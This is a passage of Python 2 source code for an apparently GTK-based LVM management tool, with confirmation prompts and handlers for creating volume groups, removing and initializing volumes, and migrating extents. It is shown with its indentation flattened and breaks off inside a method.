MOUNTED_WARNING=_("BIG WARNING: Logical Volume %s has an %s file system on it and is currently mounted on %s. Are you absolutely certain that you wish to discard the data on this mounted filesystem?")
UNMOUNT_PROMPT=_("Logical Volume %s is currently mounted on %s. In order to complete request, it has to be unmounted. Are you sure you want it unmounted?")
###TRANSLATOR: An extent below is an abstract unit of storage. The size
###of an extent is user-definable.
REMAINING_SPACE_VGNAME=_("Unused space on %s")
REMAINING_SPACE_MEGABYTES=_("%s megabytes")
REMAINING_SPACE_KILOBYTES=_("%s kilobytes")
REMAINING_SPACE_GIGABYTES=_("%s gigabytes")
REMAINING_SPACE_EXTENTS=_("%s extents")
REMAINING_SPACE_VG=_("Remaining free space in Volume Group:\n")
REMAINING_SPACE_AFTER=_("Remaining space for this Volume:\n")
EXTENTS=_("Extents")
GIGABYTES=_("Gigabytes")
MEGABYTES=_("Megabytes")
KILOBYTES=_("Kilobytes")
NUMBERS_ONLY=_("The %s should only contain number values")
NUMBERS_ONLY_MAX_PVS=_("The Maximum Physical Volumes field should contain only integer values between 1 and 256")
NUMBERS_ONLY_MAX_LVS=_("The Maximum Logical Volumes field should contain only integer values between 1 and 256")
CONFIRM_PVREMOVE=_("Are you quite certain that you wish to remove %s from Logical Volume Management?")
SOLO_PV_IN_VG=_("The Physical Volume named %s, that you wish to remove, has data from active Logical Volume(s) mapped to its extents. Because it is the only Physical Volume in the Volume Group, there is no place to move the data to. Recommended action is either to add a new Physical Volume before removing this one, or else remove the Logical Volumes that are associated with this Physical Volume.")
CONFIRM_PV_VG_REMOVE=_("Are you quite certain that you wish to remove %s from the %s Volume Group?")
CONFIRM_VG_REMOVE=_("Removing Physical Volume %s from the Volume Group %s will leave the Volume group empty, and it will be removed as well. Do you wish to proceed?")
NOT_ENOUGH_SPACE_VG=_("Volume Group %s does not have enough space to move the data stored on %s. A possible solution would be to add an additional Physical Volume to the Volume Group.")
NO_DM_MIRROR=_("The dm-mirror module is either not loaded in your kernel, or your kernel does not support the dm-mirror target. If it is supported, try running \"modprobe dm-mirror\". Otherwise, operations that require moving data on Physical Extents are unavailable.")
NO_DM_SNAPSHOT=_("The dm-snapshot module is either not loaded in your kernel, or your kernel does not support the dm-snapshot target. If it is supported, try running \"modprobe dm-snapshot\". Otherwise, creation of snapshots is unavailable.")
CONFIRM_LV_REMOVE=_("Are you quite certain that you wish to remove logical volume %s?")
CONFIRM_LV_REMOVE_FILESYSTEM=_("Logical volume %s contains %s filesystem. All data on it will be lost! Are you quite certain that you wish to remove logical volume %s?")
CONFIRM_LV_REMOVE_MOUNTED=_("Logical volume %s contains data from directory %s. All data in it will be lost! Are you quite certain that you wish to remove logical volume %s?")
###########################################################
class InputController:
def __init__(self, reset_tree_model, treeview, model_factory, glade_xml):
self.reset_tree_model = reset_tree_model
self.treeview = treeview
self.model_factory = model_factory
self.glade_xml = glade_xml
self.command_handler = CommandHandler()
self.section_list = list()
self.section_type = UNSELECTABLE_TYPE
self.setup_dialogs()
# check if pvmove is in progress
if self.model_factory.pvmove_in_progress():
self.command_handler.complete_pvmove()
def setup_dialogs(self):
self.init_entity_button = self.glade_xml.get_widget('uninit_button')
self.init_entity_button.connect("clicked", self.on_init_entity)
self.setup_new_vg_form()
#self.setup_pv_rm_migrate()
#self.setup_pv_rm()
###################
##This form adds an unallocated PV to a VG
self.add_pv_to_vg_dlg = self.glade_xml.get_widget('add_pv_to_vg_form')
self.add_pv_to_vg_dlg.connect("delete_event",self.add_pv_to_vg_delete_event)
self.add_pv_to_vg_button = self.glade_xml.get_widget('add_pv_to_vg_button')
self.add_pv_to_vg_button.connect("clicked",self.on_add_pv_to_vg)
self.add_pv_to_vg_treeview = self.glade_xml.get_widget('add_pv_to_vg_treeview')
self.ok_add_pv_to_vg_button = self.glade_xml.get_widget('ok_add_pv_to_vg_button')
self.ok_add_pv_to_vg_button.connect("clicked",self.on_ok_add_pv_to_vg)
self.cancel_add_pv_to_vg_button = self.glade_xml.get_widget('cancel_add_pv_to_vg_button')
self.cancel_add_pv_to_vg_button.connect("clicked",self.on_cancel_add_pv_to_vg)
self.add_pv_to_vg_label = self.glade_xml.get_widget('add_pv_to_vg_label')
model = gtk.ListStore (gobject.TYPE_STRING,
gobject.TYPE_STRING)
self.add_pv_to_vg_treeview.set_model(model)
renderer1 = gtk.CellRendererText()
column1 = gtk.TreeViewColumn("Volume Groups",renderer1, text=0)
self.add_pv_to_vg_treeview.append_column(column1)
renderer2 = gtk.CellRendererText()
column2 = gtk.TreeViewColumn("Size",renderer2, text=1)
self.add_pv_to_vg_treeview.append_column(column2)
# new lv button
self.new_lv_button = self.glade_xml.get_widget('new_lv_button')
self.new_lv_button.connect("clicked",self.on_new_lv)
self.setup_extend_vg_form()
self.setup_misc_widgets()
##################
##This form adds a new VG
def setup_new_vg_form(self):
self.new_vg_dlg = self.glade_xml.get_widget('new_vg_form')
self.new_vg_dlg.connect("delete_event",self.new_vg_delete_event)
self.new_vg_button = self.glade_xml.get_widget('new_vg_button')
self.new_vg_button.connect("clicked", self.on_new_vg)
self.ok_new_vg_button = self.glade_xml.get_widget('ok_new_vg_button')
self.ok_new_vg_button.connect("clicked",self.ok_new_vg)
self.cancel_new_vg_button = self.glade_xml.get_widget('cancel_new_vg_button')
self.cancel_new_vg_button.connect("clicked", self.cancel_new_vg)
##Buttons and fields...
self.new_vg_name = self.glade_xml.get_widget('new_vg_name')
self.new_vg_max_pvs = self.glade_xml.get_widget('new_vg_max_pvs')
self.new_vg_max_lvs = self.glade_xml.get_widget('new_vg_max_lvs')
self.new_vg_extent_size = self.glade_xml.get_widget('new_vg_extent_size')
self.new_vg_radio_meg = self.glade_xml.get_widget('radiobutton1')
self.new_vg_radio_meg.connect('clicked', self.change_new_vg_radio)
self.new_vg_radio_kilo = self.glade_xml.get_widget('radiobutton2')
self.new_vg_clustered = self.glade_xml.get_widget('clustered_butt')
def on_new_vg(self, button):
self.prep_new_vg_dlg()
self.new_vg_dlg.show()
def cancel_new_vg(self, button):
self.new_vg_dlg.hide()
def ok_new_vg(self, button):
Name_request = ""
max_physical_volumes = 256
max_logical_volumes = 256
phys_extent_size = 8
phys_extent_units_meg = True
autobackup = True
resizable = True
selection = self.treeview.get_selection()
model,iter = selection.get_selected()
pv = model.get_value(iter, OBJ_COL)
proposed_name = self.new_vg_name.get_text().strip()
if proposed_name == "":
self.errorMessage(MUST_PROVIDE_VG_NAME)
return
#Now check for unique name
vg_list = self.model_factory.get_VGs()
for vg in vg_list:
if vg.get_name() == proposed_name:
self.new_vg_name.select_region(0, (-1))
self.errorMessage(NON_UNIQUE_VG_NAME % proposed_name)
return
Name_request = proposed_name
max_pvs_field = self.new_vg_max_pvs.get_text()
if max_pvs_field.isalnum() == False:
self.errorMessage(NUMBERS_ONLY_MAX_PVS)
self.new_vg_max_pvs.set_text(str(MAX_PHYSICAL_VOLS))
return
else:
max_pvs = int(max_pvs_field)
if (max_pvs < 1) or (max_pvs > MAX_PHYSICAL_VOLS):
self.errorMessage(NUMBERS_ONLY_MAX_PVS)
self.new_vg_max_pvs.set_text(str(MAX_PHYSICAL_VOLS))
return
max_physical_volumes = max_pvs
max_lvs_field = self.new_vg_max_lvs.get_text()
if max_lvs_field.isalnum() == False:
self.errorMessage(NUMBERS_ONLY_MAX_LVS)
self.new_vg_max_lvs.set_text(str(MAX_LOGICAL_VOLS))
return
else:
max_lvs = int(max_lvs_field)
if (max_lvs < 1) or (max_lvs > MAX_LOGICAL_VOLS):
self.errorMessage(NUMBERS_ONLY_MAX_LVS)
self.new_vg_max_lvs.set_text(str(MAX_LOGICAL_VOLS))
return
max_logical_volumes = max_lvs
extent_idx = self.new_vg_extent_size.get_history()
phys_extent_units_meg = self.new_vg_radio_meg.get_active()
clustered = self.new_vg_clustered.get_active()
if clustered:
msg = _("In order for Volume Group to be safely used in clustered environment, lvm2-cluster rpm has to be installed, `lvmconf --enable-cluster` has to be executed and clvmd service has to be running")
self.infoMessage(msg)
try:
self.command_handler.create_new_vg(Name_request,
str(max_physical_volumes),
str(max_logical_volumes),
ACCEPTABLE_EXTENT_SIZES[extent_idx],
phys_extent_units_meg,
pv.get_path(),
clustered)
except CommandError, e:
self.errorMessage(e.getMessage())
self.new_vg_dlg.hide()
apply(self.reset_tree_model, [Name_request])
def prep_new_vg_dlg(self):
self.new_vg_name.set_text("")
self.new_vg_max_pvs.set_text(str(MAX_PHYSICAL_VOLS))
self.new_vg_max_lvs.set_text(str(MAX_LOGICAL_VOLS))
self.new_vg_radio_meg.set_active(True)
self.new_vg_extent_size.set_history(DEFAULT_EXTENT_SIZE_MEG_IDX)
self.new_vg_clustered.set_active(False)
def change_new_vg_radio(self, button):
menu = self.new_vg_extent_size.get_menu()
items = menu.get_children()
#We don't want to offer the 2 and 4 options for kilo's - min size is 8k
if self.new_vg_radio_meg.get_active() == True:
items[0].set_sensitive(True)
items[1].set_sensitive(True)
self.new_vg_extent_size.set_history(DEFAULT_EXTENT_SIZE_MEG_IDX)
else:
items[0].set_sensitive(False)
items[1].set_sensitive(False)
self.new_vg_extent_size.set_history(DEFAULT_EXTENT_SIZE_KILO_IDX)
def on_pv_rm(self, button):
self.remove_pv()
def remove_pv(self, pv=None):
mapped_lvs = True
solo_pv = False
reset_tree = False
if pv == None:
reset_tree = True #This says that tree reset will not be handled by caller
selection = self.treeview.get_selection()
model, iter = selection.get_selected()
pv = model.get_value(iter, OBJ_COL)
vg = pv.get_vg()
# first check if all extents can be migrated
for extent in pv.get_extent_blocks():
extents_lv = extent.get_lv()
if extents_lv.is_used():
error_message = None
if extents_lv.is_mirror_log:
error_message = _("Physical Volume %s contains extents belonging to a mirror log of Logical Volume %s. Mirrored Logical Volumes are not yet migratable, so %s is not removable.")
error_message = error_message % (pv.get_path(), extents_lv.get_name(), pv.get_path())
elif extents_lv.is_mirror_image:
error_message = _("Physical Volume %s contains extents belonging to a mirror image of Logical Volume %s. Mirrored Logical Volumes are not yet migratable, so %s is not removable.")
error_message = error_message % (pv.get_path(), extents_lv.get_name(), pv.get_path())
elif extents_lv.is_snapshot():
error_message = _("Physical Volume %s contains extents belonging to %s, a snapshot of %s. Snapshots are not yet migratable, so %s is not removable.")
error_message = error_message % (pv.get_path(), extents_lv.get_name(), extents_lv.get_snapshot_info()[0].get_name(), pv.get_path())
elif extents_lv.has_snapshots():
snapshots = extents_lv.get_snapshots()
if len(snapshots) == 1:
error_message = _("Physical Volume %s contains extents belonging to %s, the origin of snapshot %s. Snapshot origins are not yet migratable, so %s is not removable.")
else:
error_message = _("Physical Volume %s contains extents belonging to %s, the origin of snapshots %s. Snapshot origins are not yet migratable, so %s is not removable.")
snapshots_string = snapshots[0].get_name()
for snap in snapshots[1:]:
            snapshots_string = snapshots_string + ', ' + snap.get_name()
error_message = error_message % (pv.get_path(), extents_lv.get_name(), snapshots_string, pv.get_path())
if error_message != None:
self.errorMessage(error_message)
return False
#The following cases must be considered in this method:
#1) a PV is to be removed that has extents mapped to an LV:
# 1a) if there are other PVs, call pvmove on the PV to migrate the
# data to other PVs in the VG
# i) If there is sufficient room, pvmove the extents, then vgreduce
# ii) If there is not room, inform the user to add more storage and
# try again later
# 1b) If there are not other PVs, state that either more PVs must
# be added so that the in use extents can be migrated, or else
# present a list of LVs that must be removed in order to
# remove the PV
#2) a PV is to be removed that has NO LVs mapped to its extents:
# 2a) If there are more than one PV in the VG, just vgreduce away the PV
# 2b) If the PV is the only one, then vgremove the VG
#
total, alloc, free = pv.get_extent_total_used_free()
pv_list = vg.get_pvs().values()
if len(pv_list) <= 1: #This PV is the only one in the VG
solo_pv = True
else:
solo_pv = False
extent_list = pv.get_extent_blocks()[:] # copy
if len(extent_list) == 1: #There should always be at least one extent seg
#We now know either the entire PV is used by one LV, or else it is
#an unutilized PV. If the latter, we can just vgreduce it away
#if (seg_name == FREE) or (seg_name == UNUSED):
if extent_list[0].get_lv().is_used():
mapped_lvs = True
else:
mapped_lvs = False
else:
mapped_lvs = True
#Cases:
if mapped_lvs == False:
if solo_pv:
#call vgremove
retval = self.warningMessage(CONFIRM_VG_REMOVE % (pv.get_path(),vg.get_name()))
if (retval == gtk.RESPONSE_NO):
return False
try:
self.command_handler.remove_vg(vg.get_name())
except CommandError, e:
self.errorMessage(e.getMessage())
return False
else: #solo_pv is False, more than one PV...
retval = self.warningMessage(CONFIRM_PV_VG_REMOVE % (pv.get_path(),vg.get_name()))
if (retval == gtk.RESPONSE_NO):
return False
try:
self.command_handler.reduce_vg(vg.get_name(), pv.get_path())
except CommandError, e:
self.errorMessage(e.getMessage())
return False
else:
#Two cases here: if solo_pv, bail, else check for size needed
if solo_pv:
self.errorMessage(SOLO_PV_IN_VG % pv.get_path())
return False
else: #There are additional PVs. We need to check space
ext_total, ext_used, ext_free = vg.get_extent_total_used_free()
actual_free_exts = ext_free - free
if alloc <= actual_free_exts:
if self.command_handler.is_dm_mirror_loaded() == False:
self.errorMessage(NO_DM_MIRROR)
return False
retval = self.warningMessage(CONFIRM_PV_VG_REMOVE % (pv.get_path(),vg.get_name()))
if (retval == gtk.RESPONSE_NO):
return False
# remove unused from extent_list
for ext in extent_list[:]:
if ext.get_lv().is_used() == False:
extent_list.remove(ext)
dlg = self.migrate_exts_dlg(True, pv, extent_list)
if dlg == None:
return False
exts_structs = []
for ext in extent_list:
exts_structs.append(ext.get_start_size())
try:
self.command_handler.move_pv(pv.get_path(), exts_structs, dlg.get_data())
except CommandError, e:
self.errorMessage(e.getMessage())
return True
try:
self.command_handler.reduce_vg(vg.get_name(), pv.get_path())
except CommandError, e:
self.errorMessage(e.getMessage())
return True
else:
self.errorMessage(NOT_ENOUGH_SPACE_VG % (vg.get_name(),pv.get_path()))
return False
if reset_tree == True:
apply(self.reset_tree_model, [vg.get_name()])
return True
def on_lv_rm(self, button):
self.remove_lv()
def remove_lv(self, lv=None):
reset_tree = False
if lv == None:
reset_tree = True
selection = self.treeview.get_selection()
model, iter = selection.get_selected()
lv = model.get_value(iter, OBJ_COL)
if lv.has_snapshots():
snapshots = lv.get_snapshots()
if len(snapshots) == 1:
self.errorMessage(CANNOT_REMOVE_UNDER_SNAPSHOT % (lv.get_name(), snapshots[0].get_name()))
else:
snaps_str = snapshots[0].get_name()
for snap in snapshots[1:]:
snaps_str = snaps_str + ', ' + snap.get_name()
self.errorMessage(CANNOT_REMOVE_UNDER_SNAPSHOTS % (lv.get_name(), snaps_str))
return False
mountpoint = self.model_factory.getMountPoint(lv.get_path())
fs = Filesystem.get_fs(lv.get_path())
if fs.name == Filesystem.get_filesystems()[0].name:
fs = None
fstab_mountpoint = Fstab.get_mountpoint(lv.get_path())
# prompt for confirmation
message = None
if mountpoint == None:
if fs == None:
message = CONFIRM_LV_REMOVE % lv.get_name()
else:
message = CONFIRM_LV_REMOVE_FILESYSTEM % (lv.get_name(), fs.name, lv.get_name())
else:
message = CONFIRM_LV_REMOVE_MOUNTED % (lv.get_name(), mountpoint, lv.get_name())
retval = self.warningMessage(message)
if retval == gtk.RESPONSE_NO:
return False
# unmount and remove from fstab
if mountpoint != None:
try:
self.command_handler.unmount(mountpoint)
except CommandError, e:
self.errorMessage(e.getMessage())
return False
if fstab_mountpoint != None:
Fstab.remove(fstab_mountpoint)
# finally remove lv
try:
self.command_handler.remove_lv(lv.get_path())
except CommandError, e:
self.errorMessage(e.getMessage())
return False
if reset_tree:
apply(self.reset_tree_model, [lv.get_vg().get_name()])
return True
def on_rm_select_lvs(self, button):
if self.section_list == None:
return
#check if list > 0
lvs_to_remove = self.section_list[:]
if len(lvs_to_remove) == 0:
return
vg = lvs_to_remove[0].get_vg()
# check if all operations could be completed
for lv in lvs_to_remove:
if lv.has_snapshots():
for snap in lv.get_snapshots():
if snap not in lvs_to_remove:
self.errorMessage(UNABLE_TO_PROCESS_REQUEST + '\n' + _("Logical Volume \"%s\" has snapshots that are not selected for removal. They must be removed as well.") % lv.get_name())
return
# remove snapshots first
reload_lvm = False
reset_tree_model = False
for lv in lvs_to_remove[:]:
if lv.is_snapshot():
lvs_to_remove.remove(lv)
if self.remove_lv(lv):
# success
reload_lvm = True
else:
# remove_lv failure
origin = lv.get_snapshot_info()[0]
if origin in lvs_to_remove:
            msg = _("\"%s\", an origin of snapshot \"%s\", has been removed from the removal list.")
msg = msg % (origin.get_name(), lv.get_name())
self.simpleInfoMessage(msg)
lvs_to_remove.remove(origin)
if reload_lvm:
self.model_factory.reload()
vg = self.model_factory.get_VG(vg.get_name())
reset_tree_model = True
# remove other lvs
for lv in lvs_to_remove:
if self.remove_lv(vg.get_lvs()[lv.get_name()]):
reset_tree_model = True
if reset_tree_model:
self.clear_highlighted_sections()
apply(self.reset_tree_model, [vg.get_name()])
def on_rm_select_pvs(self, button):
if self.section_list == None:
return
#need to check if list > 0
if len(self.section_list) == 0:
return
# check if all operations could be completed
for pv in self.section_list:
for extent in pv.get_extent_blocks():
extents_lv = extent.get_lv()
if extents_lv.is_used():
error_message = None
if extents_lv.is_mirror_log or extents_lv.is_mirror_image:
error_message = _("Physical Volume \"%s\" contains extents belonging to a mirror. Mirrors are not migratable, so %s is not removable.")
error_message = error_message % (pv.get_path(), pv.get_path())
elif extents_lv.is_snapshot() or extents_lv.has_snapshots():
error_message = _("Physical Volume \"%s\" contains extents belonging to a snapshot or a snapshot's origin. Snapshots are not migratable, so %s is not removable.")
error_message = error_message % (pv.get_path(), pv.get_path())
if error_message != None:
self.errorMessage(UNABLE_TO_PROCESS_REQUEST + '\n' + error_message)
return
# do the job
reset_tree_model = False
for pv in self.section_list:
pvpath = pv.get_path()
vgname = pv.get_vg().get_name()
pv_to_remove = self.model_factory.get_VG(vgname).get_pvs()[pvpath]
if self.remove_pv(pv_to_remove):
# remove_pv migrates extents -> need to reload lvm data
self.model_factory.reload()
reset_tree_model = True
selection = self.treeview.get_selection()
model,iter = selection.get_selected()
vg = model.get_value(iter, OBJ_COL)
if reset_tree_model:
self.clear_highlighted_sections()
apply(self.reset_tree_model, [vg.get_name()])
def on_new_lv(self, button):
main_selection = self.treeview.get_selection()
main_model, main_iter = main_selection.get_selected()
main_path = main_model.get_path(main_iter)
vg = main_model.get_value(main_iter, OBJ_COL)
if len(vg.get_lvs().values()) == vg.get_max_lvs():
self.errorMessage(EXCEEDED_MAX_LVS)
return
total_exts, used_exts, free_exts = vg.get_extent_total_used_free()
if free_exts == 0:
self.errorMessage(NOT_ENOUGH_SPACE_FOR_NEW_LV % vg.get_name())
return
dlg = LV_edit_props(None, vg, self.model_factory, self.command_handler)
if dlg.run() == False:
return
apply(self.reset_tree_model,[vg.get_name()])
def on_init_entity(self, button):
selection = self.treeview.get_selection()
model,iter = selection.get_selected()
pv = model.get_value(iter, OBJ_COL)
if self.initialize_entity(pv) == None:
return
apply(self.reset_tree_model, ['', '', pv.get_path()])
def on_init_entity_from_menu(self, obj, dlg=None):
if dlg == None:
dlg = self.glade_xml.get_widget("init_block_device_dlg")
label = self.glade_xml.get_widget("init_block_device_dlg_path")
label.select_region(0, (-1))
label.grab_focus()
rc = dlg.run()
dlg.hide()
if rc == gtk.RESPONSE_APPLY:
path = label.get_text().strip()
target = follow_links_to_target(path)
if target == None:
self.errorMessage(_("The path you specified does not exist."))
self.on_init_entity_from_menu(None, dlg)
return
else:
o = execWithCapture('/bin/ls', ['/bin/ls', '-l', target])
output = o.strip()
if output[0] != 'b':
self.errorMessage(_("The path you specified is not a Block Device."))
self.on_init_entity_from_menu(None, dlg)
return
pv = PhysicalVolume.PhysicalVolume(path, None, None, 0, 0, False, 0, 0)
pv.set_path(path)
self.glade_xml.get_widget("init_block_device_dlg_path").set_text('')
if self.initialize_entity(pv) == None:
self.glade_xml.get_widget("init_block_device_dlg_path").set_text(path)
self.on_init_entity_from_menu(None, dlg)
else:
apply(self.reset_tree_model, ['', '', pv.get_path()])
else:
self.glade_xml.get_widget("init_block_device_dlg_path").set_text('')
def initialize_entity(self, pv):
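    # Ask the user for confirmation (unmounting and overwriting an existing
    # filesystem if necessary), optionally partition a whole device first,
    # then hand the path to the command handler for initialization.
    # Returns the initialized path, or None if cancelled or failed.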
path = pv.get_path()
mountPoint = self.model_factory.getMountPoint(path)
doFormat = False
message = ''
if mountPoint == None:
fs = Filesystem.get_fs(path)
if fs.name == Filesystem.get_filesystems()[0].name:
fs = None
if fs == None:
if pv.needsFormat():
if pv.wholeDevice():
message = INIT_ENTITY % path
else:
# disabled until fdisk_wrapper gets into reliable shape
# doFormat = True
# message = INIT_ENTITY_FREE_SPACE % (pv.get_volume_size_string(), path)
return None
else:
message = INIT_ENTITY % path
else:
message = INIT_ENTITY_FILESYSTEM % (path, fs.name, path)
else:
message = INIT_ENTITY_MOUNTED % (path, mountPoint, path)
rc = self.warningMessage(message)
if (rc == gtk.RESPONSE_NO):
return None
if mountPoint != None:
try:
self.command_handler.unmount(mountPoint)
except CommandError, e:
self.errorMessage(e.getMessage())
return None
if pv.needsFormat() and pv.wholeDevice():
dialog = self.glade_xml.get_widget('whole_device_format_choice')
label = self.glade_xml.get_widget('whole_device_format_choice_label')
label.set_text(INIT_ENTITY_DEVICE_CHOICE % path)
rc = dialog.run()
dialog.hide()
if rc == gtk.RESPONSE_YES:
doFormat = True
elif rc == gtk.RESPONSE_NO:
doFormat = False
else:
return None
try:
if doFormat:
# format
devpath = path
path = self.model_factory.partition_UV(pv)
# tell kernel to reread new partition table
if self.command_handler.reread_partition_table(devpath) == False:
message = RESTART_COMPUTER % pv.getDevnames()[0]
self.errorMessage(message)
self.errorMessage(_("Initialization of %s failed") % pv.getDevnames()[0])
return None
self.command_handler.initialize_entity(path)
except CommandError, e:
self.errorMessage(e.getMessage())
return None
return path
def on_add_pv_to_vg(self, button):
model = self.add_pv_to_vg_treeview.get_model()
if model != None:
model.clear()
vg_list = self.model_factory.get_VGs()
if len(vg_list) > 0:
for vg in vg_list:
iter = model.append()
model.set(iter,
NAME_COL, vg.get_name(),
SIZE_COL, vg.get_size_total_used_free_string()[0])
selection = self.treeview.get_selection()
main_model, iter_val = selection.get_selected()
pv = main_model.get_value(iter_val, OBJ_COL)
label_string = ADD_PV_TO_VG_LABEL % pv.get_path()
self.add_pv_to_vg_label.set_text(label_string)
self.add_pv_to_vg_treeview.set_model(model)
self.add_pv_to_vg_dlg.show()
def add_pv_to_vg_delete_event(self, *args):
self.add_pv_to_vg_dlg.hide()
return True
def on_ok_add_pv_to_vg(self, button):
selection = self.treeview.get_selection()
main_model, iter_val = selection.get_selected()
pv = main_model.get_value(iter_val, OBJ_COL)
selection = self.add_pv_to_vg_treeview.get_selection()
model, iter = selection.get_selected()
vgname = model.get_value(iter, NAME_COL)
vg = self.model_factory.get_VG(vgname)
#Check if this VG allows an Additional PV
if vg.get_max_pvs() == len(vg.get_pvs().values()):
self.errorMessage(EXCEEDED_MAX_PVS)
self.add_pv_to_vg_dlg.hide()
return
try:
self.command_handler.add_unalloc_to_vg(pv.get_path(), vgname)
except CommandError, e:
self.errorMessage(e.getMessage())
return
apply(self.reset_tree_model, [vg.get_name()])
self.add_pv_to_vg_dlg.hide()
def on_cancel_add_pv_to_vg(self,button):
self.add_pv_to_vg_dlg.hide()
def setup_extend_vg_form(self):
self.on_extend_vg_button = self.glade_xml.get_widget('on_extend_vg_button')
self.on_extend_vg_button.connect("clicked",self.on_extend_vg)
self.extend_vg_form = self.glade_xml.get_widget('extend_vg_form')
self.extend_vg_form.connect("delete_event",self.extend_vg_delete_event)
self.extend_vg_tree = self.glade_xml.get_widget('extend_vg_tree')
self.extend_vg_label = self.glade_xml.get_widget('extend_vg_label')
self.glade_xml.get_widget('on_ok_extend_vg').connect('clicked', self.on_ok_extend_vg)
self.glade_xml.get_widget('on_cancel_extend_vg').connect('clicked',self.on_cancel_extend_vg)
#set up columns for tree
model = gtk.ListStore (gobject.TYPE_STRING,
gobject.TYPE_STRING,
gobject.TYPE_STRING,
gobject.TYPE_INT,
gobject.TYPE_PYOBJECT)
self.extend_vg_tree.set_model(model)
renderer1 = gtk.CellRendererText()
column1 = gtk.TreeViewColumn(ENTITY_NAME,renderer1, text=0)
self.extend_vg_tree.append_column(column1)
renderer2 = gtk.CellRendererText()
column2 = gtk.TreeViewColumn(ENTITY_SIZE,renderer2, text=1)
self.extend_vg_tree.append_column(column2)
renderer3 = gtk.CellRendererText()
column3 = gtk.TreeViewColumn(ENTITY_TYPE,renderer3, markup=2)
self.extend_vg_tree.append_column(column3)
# set up multiselection
self.extend_vg_tree.get_selection().set_mode(gtk.SELECTION_MULTIPLE)
def on_extend_vg(self, button):
main_selection = self.treeview.get_selection()
main_model,main_iter = main_selection.get_selected()
main_path = main_model.get_path(main_iter)
vg = main_model.get_value(main_iter, OBJ_COL)
if vg.get_max_pvs() == len(vg.get_pvs().values()):
self.errorMessage(EXCEEDED_MAX_PVS)
return
self.rebuild_extend_vg_tree()
self.extend_vg_form.show()
def on_ok_extend_vg(self, button):
selection = self.extend_vg_tree.get_selection()
if selection == None:
      self.extend_vg_form.hide() #cancel op if OK clicked w/o selection
      return
#Now get name of VG to be extended...
main_selection = self.treeview.get_selection()
main_model,main_iter = main_selection.get_selected()
main_path = main_model.get_path(main_iter)
vg = main_model.get_value(main_iter, OBJ_COL)
# handle selections
model, treepathlist = selection.get_selected_rows()
# check if pvs can be added to vg
max_addable_pvs = vg.get_max_pvs() - len(vg.get_pvs().values())
if max_addable_pvs < len(treepathlist):
self.errorMessage(EXCEEDING_MAX_PVS % max_addable_pvs)
return
reset_tree_model = False
for treepath in treepathlist:
iter = model.get_iter(treepath)
entity_path = model.get_value(iter, NAME_COL)
entity_type = model.get_value(iter, VOL_TYPE_COL)
if entity_type == UNINIT_VOL: #First, initialize if necessary
entity = model.get_value(iter, OBJ_COL)
entity_path = self.initialize_entity(entity)
if entity_path == None:
continue
try:
self.command_handler.add_unalloc_to_vg(entity_path, vg.get_name())
except CommandError, e:
self.errorMessage(e.getMessage())
continue
reset_tree_model = True
self.extend_vg_form.hide()
if reset_tree_model:
apply(self.reset_tree_model, [vg.get_name()])
def on_cancel_extend_vg(self, button):
self.extend_vg_form.hide()
def extend_vg_delete_event(self, *args):
self.extend_vg_form.hide()
return True
def rebuild_extend_vg_tree(self):
uv_string = "<span foreground=\"#ED1C2A\"><b>" + UNALLOCATED_PV + "</b></span>"
iv_string = "<span foreground=\"#BBBBBB\"><b>" + UNINIT_DE + "</b></span>"
model = self.extend_vg_tree.get_model()
if model != None:
model.clear()
unallocated_vols = self.model_factory.query_unallocated()
for vol in unallocated_vols:
iter = model.append()
model.set(iter,
NAME_COL, vol.get_path(),
SIZE_COL, vol.get_size_total_string(),
PATH_COL, uv_string,
VOL_TYPE_COL, UNALLOC_VOL,
OBJ_COL, vol)
uninitialized_list = self.model_factory.query_uninitialized()
for item in uninitialized_list:
if item.initializable:
iter = model.append()
model.set(iter,
NAME_COL, item.get_path(),
SIZE_COL, item.get_size_total_string(),
PATH_COL, iv_string,
VOL_TYPE_COL,UNINIT_VOL,
OBJ_COL, item)
selection = self.treeview.get_selection()
main_model, iter_val = selection.get_selected()
vg = main_model.get_value(iter_val, OBJ_COL)
self.extend_vg_label.set_text(ADD_VG_LABEL % vg.get_name())
def new_vg_delete_event(self, *args):
self.new_vg_dlg.hide()
return True
def setup_misc_widgets(self):
self.remove_unalloc_pv = self.glade_xml.get_widget('remove_unalloc_pv')
self.remove_unalloc_pv.connect("clicked",self.on_remove_unalloc_pv)
self.on_pv_rm_button = self.glade_xml.get_widget('on_pv_rm_button')
self.on_pv_rm_button.connect("clicked",self.on_pv_rm)
self.on_lv_rm_button = self.glade_xml.get_widget('on_lv_rm_button')
self.on_lv_rm_button.connect("clicked",self.on_lv_rm)
self.on_rm_select_lvs_button = self.glade_xml.get_widget('on_rm_select_lvs')
self.on_rm_select_lvs_button.connect("clicked",self.on_rm_select_lvs)
self.on_rm_select_pvs_button = self.glade_xml.get_widget('on_rm_select_pvs')
self.on_rm_select_pvs_button.connect("clicked",self.on_rm_select_pvs)
self.migrate_exts_button = self.glade_xml.get_widget('button27')
self.migrate_exts_button.connect("clicked",self.on_migrate_exts)
self.edit_lv_button = self.glade_xml.get_widget('button35')
self.edit_lv_button.connect("clicked",self.on_edit_lv)
self.create_snapshot_button = self.glade_xml.get_widget('create_snapshot_button')
self.create_snapshot_button.connect("clicked",self.on_create_snapshot)
# misc events
self.glade_xml.get_widget("initialize_block_device1").connect('activate', self.on_init_entity_from_menu)
def on_remove_unalloc_pv(self, button):
selection = self.treeview.get_selection()
model, iter = selection.get_selected()
pv = model.get_value(iter, OBJ_COL)
retval = self.warningMessage(CONFIRM_PVREMOVE % pv.get_path())
if (retval == gtk.RESPONSE_NO):
return
else:
try:
self.command_handler.remove_pv(pv.get_path())
except CommandError, e:
self.errorMessage(e.getMessage())
return
apply(self.reset_tree_model, ['', '', pv.get_path()])
def on_migrate_exts(self, button):
selection = self.treeview.get_selection()
model, iter = selection.get_selected()
pv = model.get_value(iter, OBJ_COL)
# get selected extents
if self.section_list == None:
self.simpleInfoMessage(_("Please select some extents first"))
return
if len(self.section_list) == 0:
self.simpleInfoMessage(_("Please select some extents first"))
return
extents_from = self.section_list[:]
# dialog
dlg = self.migrate_exts_dlg(False, pv, extents_from)
if dlg == None:
return
exts_from_structs = []
for ext in extents_from:
exts_from_structs.append(ext.get_start_size())
try:
self.command_handler.move_pv(pv.get_path(), exts_from_structs, dlg.get_data())
except CommandError, e:
self.errorMessage(e.getMessage())
apply(self.reset_tree_model, [pv.get_vg().get_name()])
return
  # 'removal' is True when this dialog is shown as part of removing a PV, False for a plain extent migration
def migrate_exts_dlg(self, removal, pv, exts):
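    # Build the extent migration dialog for 'exts' (extent blocks on 'pv').
    # Only other PVs in the VG with enough free extents are offered as
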